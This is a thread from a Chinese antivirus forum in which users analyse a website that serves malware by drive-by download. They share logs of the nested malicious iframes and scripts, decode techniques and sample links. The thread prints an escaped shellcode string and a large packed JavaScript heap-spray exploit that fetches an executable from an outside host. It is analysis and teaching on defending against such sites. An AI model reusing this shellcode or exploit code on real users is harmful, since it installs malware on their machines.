瑞星卡卡安全论坛

Log is generated by FreShow.
[wide]http://f.97eee.org
    [frame]http://me.madewokao.cn/wywy.htm
        [frame]http://me.madewokao.cn/ggff.html
            [frame]http://222.2007wyt.net/ac.html
                [object]http://xxx.2009wyt.com/css.css
            [script]http://me.madewokao.cn/http:\/\/222.2007wyt.net\/614.js
            [frame]http://222.2007wyt.net/l.html
            [script]http://me.madewokao.cn/http:\/\/222.2007wyt.net\/r.js
            [frame]http://222.2007wyt.net/r.html
            [frame]http://me.madewokao.cn/fzl.htm
            [frame]http://me.madewokao.cn/123.htm
        [script]http://js.tongji.cn.yahoo.com/462201/ystat.js
            [script]http://js.tongji.cn.yahoo.com/462201/\""+_st_dest+"\"
    [script]http://f.97eee.org/jt.js
    [frame]http://a.ooaass.com/pp.htm
    [script]http://s47.cnzz.com/stat.php?id=592862&web_id=592862
    [script]http://s47.cnzz.com/stat.php?id=592815&web_id=592815

以上是我对挂马网站的分析日志。hxxp://222.2007wyt.net/ac.html下
css.css为病毒文件，下载到本地，瑞星文件监控报毒。

如果打开网站，瑞星的网站木马入侵拦截提示的是hxxp://me.madewokao.cn/123.htm挂马。

请问是怎么回事？是我遗漏了？还是瑞星提示错误？
图片请进我的博客：
http://blog.sina.com.cn/linchen9047

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)

Log is generated by FreShow.
[wide]http://f.97eee.org
    [frame]http://me.madewokao.cn/wywy.htm
        [frame]http://me.madewokao.cn/ggff.html
            [frame]http://222.2007wyt.net/ac.html
                [object]http://xxx.2009wyt.com/css.css
            [script]http://222.2007wyt.net/614.js
                [object]http://xxx.2009wyt.com/css.css
            [frame]http://222.2007wyt.net/l.html
                [object]http://xxx.2009wyt.net/bak.css
            [script]http://222.2007wyt.net/r.js
                [object]http://xxx.2009wyt.net/bak.css
            [frame]http://me.madewokao.cn/fzl.htm
            [frame]http://me.madewokao.cn/123.htm
                [object]http://222.2007wyt.net/360Safe.exe

瑞星拦截是正确的.

试了一下,地址失效了.

bak.css和360safe.exe为什么我找不到呀？需要解码的吗？能具体的教一下吗？谢谢~:default7:

%ue820%ufdda%uffff%u7468%u7074%u2f3a%u782f%u7878%u322e%u3030%u7739%u7479%u6e2e%u7465%u622f%u6b61%u632e%u7373%u0000
这个直接点decode--up--decode就可看到.

<textarea id="textareaID" rows="50" cols="100"></textarea><script language="javascript"> document.getElementById("textareaID").innerText=(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2O m="%u";2N(m+"2P"+m+"%11%11%2Q%2R%2M%2L%2H%2G%2I%2J%2K%2S%2T%31%32%33%34%30%c%2Z%0%2V%7%2U%2W%k%2X%2Y%2F%7%2E%1%9%2n%0%i%2m%0%a%2o%0%2p%0%a%2q%0%i%V%0%a%2l%0%2k%0%a%2g%0%i%2f%0%a%2h%0%2i%0%s%2j%10%P%2r%v%0%t%2s%0%2A%0%z%2B%10%P%2C%v%0%t%2D%0%2z%0%z%2y%2u%2t%k%2v%2w%I%2x%35%36%3F%3G%3H%3I%3E%3D%3z%E%3y%3A%3B%3C%0%3J%3K%5%k%3S%3T%3U%3V%E%3R%3Q%3M%3L%3N%j%3O%3P%0%3x%6%3w%0%7%o%3f%3e%3g%3h%3i%3d%3c%38%37%39%3a%3b%B%3j%I%M%D%2e%3s%3t%3u%B%3v%3r%D%3q%3m%3l%3n%3o%3p%0%3W%1E%L%L%1q%6%1n%0%1m%0%1i%1j%0%1l%1r%1%9%1y%0%M%G%G%7%1x%1u%1h%1B%18%16%17%15%14%12%13%1g%1e%1f%1%2%19%1%1d%1c%1a%1b%1v%1%Z%j%K%2d%0%6%21%0%7%Q%R%S%O%1C%0%A%N%C%22%0%23%0%Y%C%J%1%1W%1Y%j%K%2b%0%6%2c%0%7%Q%R%S%O%1V%0%A%N%1J%1D%1F%1L%1P%1O%1%1N%1Q%1R%o%1T%1S%1M%1G%1H%0%7%o%1K%1I%c%1U%28%27%26%0%29%2a%25%24%1X%1Z%20%W%Y%1t%1w%1A%0%7%1z%1s%w%b%1k%1p%1o%3k%6u%6d%0%7%e%6e%6f%5%0%6g%6c%0%6b%67%66%y%b%r%V%d%U%68%W%q%69%1%x%1%T%3%6a%6h%6i%3X%g%f%h%6%6r%1%6%6s%0%6t%d%9%l%1%e%p%6p%6o%c%6k%6j%g%f%h%6%6l%1%6%6m%0%6n%d%9%l%1%e%p%65%64%c%5N%5M%g%f%h%6%5O%1%6%5P%0%5Q%d%9%l%1%e%p%5L%5K%s%y%b%r%5G%5F%U%5H%5%q%F%1%x%1%T%5I%2%5J%0%5R%5S%60%61%5%4%3%2%62%0%63%5Z%5Y%5U%5%4%3%2%5T%0%5V%5W%5X%6v%5%4%3%2%7e%0%73%74%75%76%5%4%3%2%72%0%71%6X%6W%6Y%5%4%3%2%6Z%1%70%77%78%7g%5%4%3%2%7h%0%7i%7k%7j%7f%5%4%3%2%7a%0%79%7b%7c%7d%5%4%3%2%6V%1%6U%6D%6E%6F%5%4%3%2%6G%1%6C%6B%H%6x%5%4%3%2%6w%0%6y%6z%6A%J%0%4%3%2%6H%0%6I%6Q%6R%6S%0%4%3%2%6T%1%6P%6O%6K%6J%0%4%3%2%6L%1%6M%6N%H%5E%0%4%3%2%5D%1%4w%4x%4y%4z%0%4%3%2%4v%1%4u%4q%4p%4r%0%4%3%2%F%1%4s%4t%4A%4B%0%4%3%2%4J%0%4K%4L%4M%4I%0%4%3%2%4H%1%4D%4C%6%4E%1%6%4F%1%4G%4o%9%4n%1%2%46%1%45%47%48%49%0%4%3%2%44%0%43%3Z%3Y%40%0%4%3%41%42%n%4a%4b%4j%n%4k%4l%4m%8%4i%4h%4d%n%4c%4e%8%4f%4g%w%4N%4O%5m%5n%5o%5p%5l%8%5k%8%5g%X%5f%5h%5i%5j%5q%Z%5r%5z%5A%5B%5C%5y%5x%5t%5s%5u%5v%5w%5e%5d%8%4W%8%4X%X%8%4Y%4Z%4V%b%4U%2%4Q%1%4P%4R%4S%4T%50%51%59%5a%5b%5c%58%57%53%52%54%55%56%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%6q");',62,455,'u2121|uDEDE|uC9E2|u29E5|uA221|u2120|uC971|uF1DE|uAA1F|uC9DE|uC921|u0565|u4921|uDEDF|uE5A2|u65AC|u34CA|u2505|uD9AA|u71E1|uAA21|uDEC7|a1|u61AA|uDDAA|uE229|uC821|u7125|uCA21|uC976||u3121|uAA17|uC7C9|uAC34|u7921|uDE12|uA220|uC9F1|uEDAA|uE61F|uDF63|u7272|u7123|uE112|uDFC9|uC975|u7171|uFA12|uDE76|uC92B|u4B72|uA117|u051D|u5621|uA2DE|u71DE|u03C9|u2123|uFC22|uDE21|u12DE|uFDAA|u9090|uCDAA|u61AC|u7427|u55B1|uB124|uB1B1|u59A0|uDE09|uE3A1|u212D|u2520|u3099|uC9C1|uDE0F|uDE24|uC819|u4521|u2580|u1F01|uAC21|u38C9|u2218|uDE1F|u21DE|u7671|u4181|u2955|uAAF1|uA1C9|u3AC9|uC9D9|u19A1|u2216|uD91A|u20EA|u2E54|u2360|u7E7F|u7172|uE27A|uC935|u237C|u444C|u79F1|u4049|u23CA|u56DE|u77DE|uD8C9|uE279|uA276|u29CD|u1F76|u294B|u6468|u232A|u7672|u55DE|u1277|u0105|u05C9|u23AA|u20DA|uDE49|u1F21|u4B0E|u2998|uD5AA|u5367|uD221|u5487|u213F|u2374|u2175|uD9A2|u2DC9|u22A8|u2040|u3BC9|u7279|u11C9|u2065|u19C9|u221C|u206C|u67C9|u22FA|u4961|u2390|u2125|u1DC9|u12D9|u68E8|uE291|u76E2|uECC9|uC4C9|u72E2|u4901|u23B8|uD7C9|u85D2|uB3DB|u3358|u031C|u31C3|u66C9|u5858|u5824|spray|var|9090|uE1D9|u34D9|uE981|uFA65|u2198|u214B|u2131|uCAD9|u7F24|u0121|u2122|u3080|u4021|uFAE2|u17C9|uD3DD|uAC8F|u21E7|u1FD7|u1203|u1FF3|u71A9|uCA61|u2255|uE1A2|uE6AA|u1F29|u39AB|uFAA5|u75CD|u0555|u1231|uE2A2|u1FE1|u62E6|u200D|uF8AA|uD3CA|u5C75|u1F28|u3DA8|u25E1|u22E0|u7273|u2466|u4720|uC1DE|uC8E2|u25B4|u7EA8|u1F99|uDE66|uE27E|u1F7A|u26E7|uA07A|u35CD|uE3A2|u0301|u1229|u4971|u2025|u420E|u2563|u1FF5|u23E6|u4C42|u0145|u7021|u4D45|u71CD|u2F6F|u0BC9|u12E2|u45E1|uAF49|u212E|u6E49|uDC88|u6ECE|u7124|u1FC9|uA411|u59E1|uA215|u1F2A|u5DE1|u1D61|u41E2|uCAE2|u2961|u1F31|u1F2D|u51AA|u8C3D|uDEC9|uDEDD|u7182|uC3E8|uBBC9|u4949|uE405|uB649|uDF77|uC149|u117A|u71B5|u8FC9|u7192|uA7C9|u444B|u32CA|uDAD6|uDF8A|u96C8|uDF65|u53C9|u2176|u5349|u92DF|u7137|u054D|u1705|u5549|uDA47|u5155|u0E1B|u130E|u403D|uA817|u6A2D|u3D7B|uAA25|uE422|u1313|u130F|u4072|u1117|u4447|u440F|u4459|u120E|u5544|u1111|u5616|u5558|u4F0F|u47FC|u2205|u1AC2|u017B|u1F68|u15AA|u22AA|u396B|uF422|u64AA|u171D|u75AA|u5924|u12D4|uDDE1|u055D|u1A17|u5409|u1FFE|u7BAA|uD5CA|uD922|uA58D|u55E1|uE026|u2CEE|uDF4B|uE3C9|uDEDC|uA3C9|u8BC9|u25E5|u208A|u5946|u5749|u4E45|u4952|uDC86|u20EE|u46C8|u3A49|u67E7|u20A2|u93C9|u8B49|u2CDD|u715D|u712D|u22B6|u7158|uE7C9|u20B6|uCD49|u5657|u4249|uCA4C|u4D53|u6BC9|uDFC3|u4BE2|u5449|u4F4E|u20CE|u7E31|u997F|u49E2|u494D|u554F|u5344|u5254|uDCF0|u20D8|uB0C8|u2113|u1249|u0021|uDCDA|u2302|u9AC8|uC93D|uBFC9|u21C2|u33C9|u5F49|uC3F9|u7152|uA0B6|u7849|uBA7F|u713F|u07C9|uDF86|u21EE|uBF49|uF7C9|u719A|uDF5F|u3B49|u3F5B|u9481|u7649|u9AD8|u7114|uCBC9|uDFB3|u8A49|uDE17|u717E|u25AB|u57C9|uDFD6|u5949|uD149|u207A|uCC49|uCE77|u7117|uABC9|uFA49|u713D|u9149|u203E|u0C68|u71FA|u1BC9|u204E|u6FC9|u43C9|u2012|uCE49|u7141|uC1EF'.split('|'),0,{}))
</script>

找到这个.把eval替换成<textarea id="textareaID" rows="50" cols="100"></textarea><script language="javascript"> document.getElementById("textareaID").innerText=
保存htm,运行就能看到.然后转化一下,方法同第一个一样.key=21 decode输入21就能看到.

bak.css找到了。
但360safe弄了很久还是没弄出来。。。:kaka4:

bak.css找到了。
但360safe弄了很久还是没弄出来。。。:kaka4:

360safe（来自：http://222.2007wyt.net/360Safe.exe），挺烂的一毒。瑞星2009已经能杀。





附件: 360Safe.rar

方法操作后,能到以上.解时,要输入21,才能看到这个地址.http://222.2007wyt.net/360Safe.exe!");

可是,咱的下载不了.:default11: